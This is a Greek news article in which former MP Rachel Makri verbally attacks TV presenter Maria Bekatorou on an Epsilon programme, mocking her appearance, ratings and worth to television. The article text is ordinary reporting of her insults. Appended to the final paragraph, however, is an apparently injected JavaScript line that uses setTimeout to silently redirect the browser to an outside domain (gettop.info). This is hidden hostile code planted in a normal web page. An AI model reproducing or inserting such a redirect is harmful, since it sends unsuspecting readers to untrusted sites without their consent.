Επίθεση Ραχήλ Μακρή στη Μαρία Μπεκατώρου: Γιατί προσφέρει κάτι;

0
8

 

Φραστική επίθεση εξαπέλυσε η πρώην βουλευτής των ΑΝΕΛ Ραχήλ Μακρή κατά της παρουσιάστριας Μαρίας Μπεκατώρου μέσω εκπομπής του Epsilon.

Αρχικά η κυρία Μακρή είπε πως η κυρία Μπεκατώρου δεν αναγνωρίζεται πλέον από τις πλαστικές και συνέχισε: «Προφανώς της κυρίας Μπεκατώρου της λείπει λίγο φήμη γιατί δεν πάνε καλά τα νούμερα που έχει στην εκπομπή της που δεν την έχω δει ποτέ και ούτε πρόκειται και βρήκε τον τρόπο να κάνει επιθέσεις όπως τη χαρακτηρίζουν από ό,τι έχω καταλάβει γιατί εγώ δε τη γνωρίζω την κυρία».

Όπως συμπλήρωσε: «Να με καλέσει σε τι; Αναδείξαμε την κυρία Μπεκατώρου σε μέγιστη προσωπικότητα της χώρας; Εδώ ο κόσμος καίγεται και έχει σοβαρά προβλήματα. Εγώ είμαι πολιτικός, η κυρία Μπεκατώρου δεν ξέρω τι είναι ακριβώς. Φυσικά το κάνει για να ακούγεται το όνομα της».

«Δεν έχει τίποτα να προσφέρει στην ελληνική τηλεόραση. Γιατί προσφέρει κάτι; Εσείς βλέπετε να προσφέρει κάτι στην κοινωνία και στην τηλεόραση; Να επικεντρωθούμε σε σοβαρά θέματα και όχι στην κυρία που θα την κάνουμε και διάσημη» δήλωσε η Ραχήλ Μακρή.

Επίσης, σημείωσε ότι η προσωπικότητα της ίδιας δεν ταιριάζει με την Ελλάδα οπότε μια πολιτική εκπομπή όπως θα την ήθελε θα ταίριαζε σε… ξενες χώρες.

«Δεν ξέρω αν θα ενδιέφερε κάποιο κανάλι σε αυτή τη χώρα να κάνω εγώ πολιτική εκπομπή, γιατί αυτά και η προσωπικότητα η δικιά μου είναι για ξένες χώρες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here